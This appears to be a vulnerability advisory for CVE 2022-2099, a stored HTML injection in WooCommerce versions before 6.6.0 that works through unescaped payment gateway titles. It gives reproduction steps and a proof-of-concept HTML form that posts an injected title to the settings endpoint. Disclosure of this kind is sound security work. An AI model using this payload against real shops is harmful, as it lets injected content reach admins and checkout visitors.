WooCommerce < 6.6.0 – Admin+ Stored HTML Injection | CVE 2022-2099

Description

The plugin is vulnerable to stored HTML injection due to lack of escaping and sanitizing in the payment gateway titles

Proof of Concept

Go to WooCommerce -> Settings -> Payments tab, enable BAC (Bank Account Transfers) and edit the title in the setup dialog. HTML can be injected there, and will be rendered both for admins (in the admin panel) and visitors in the checkout screen.

<html>
<form action="http://example.com/wp-admin/admin.php?page=wc-settings&tab=checkout&section=bacs" method="POST">
<input class="input-text regular-input " type="text" name="woocommerce_bacs_title" id="woocommerce_bacs_title" style="" value="HTML INJECTION" placeholder="">

<p class="submit">
	<button name="save" class="button-primary woocommerce-save-button" type="submit" value="Save changes">Save changes</button>
	<input type="hidden" id="_wpnonce" name="_wpnonce" value="bfdcc984ec"><input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=wc-settings&amp;tab=checkout&amp;section=bacs">		</p>
    </form>
</html>